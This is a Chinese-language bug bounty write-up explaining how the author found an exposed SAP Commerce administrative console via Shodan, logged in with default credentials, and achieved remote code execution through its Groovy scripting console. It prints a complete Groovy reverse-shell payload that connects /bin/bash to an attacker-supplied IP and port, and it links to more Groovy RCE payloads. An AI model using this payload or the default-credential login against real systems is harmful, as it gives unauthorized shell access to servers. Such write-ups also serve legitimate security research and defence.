如何在BBP漏洞赏金项目中实现两处远程代码执行(RCE)

我是如何在BBP漏洞赏金项目中发现两处RCE漏洞的

当我在BBP漏洞赏金项目进行漏洞挖掘时，我使用Shodan搜索了"ssl:BBP.com"，发现了一个IP地址：40.117..。使用dirsearch工具扫描后，我发现了这个地址：http://40.117..**/hac/login/ —— 这是SAP Commerce的默认管理后台登录页面。

通过Google搜索，我找到了默认凭证：

• 用户名：admin
• 密码：nimda
  （来源：https://www.cloudnir.com/sap-commerce-cloud-consoles/hybris-administrative-console-hac/）

成功登录管理面板后，我发现了一个控制台选项卡：http://40.117..*/hac/console/scripting/。这个控制台支持Groovy脚本语言（更多关于Groovy的信息：https://en.wikipedia.org/wiki/Apache_Groovy）。

我使用以下代码实现了远程代码执行(RCE)：

String host="Your Ip Here";
int port=Your Port;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}
    catch (Exception e){}
};
p.destroy();
s.close();

获得RCE后，我再次使用Shodan搜索更多IP地址，发现了相同的hac应用程序，并向目标项目报告了这些漏洞。

更多Groovy payload可以参考：

• https://coldfusionx.github.io/posts/Groovy_RCE/
• https://coldfusionx.github.io/posts/Groovy_RCE/

更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
公众号二维码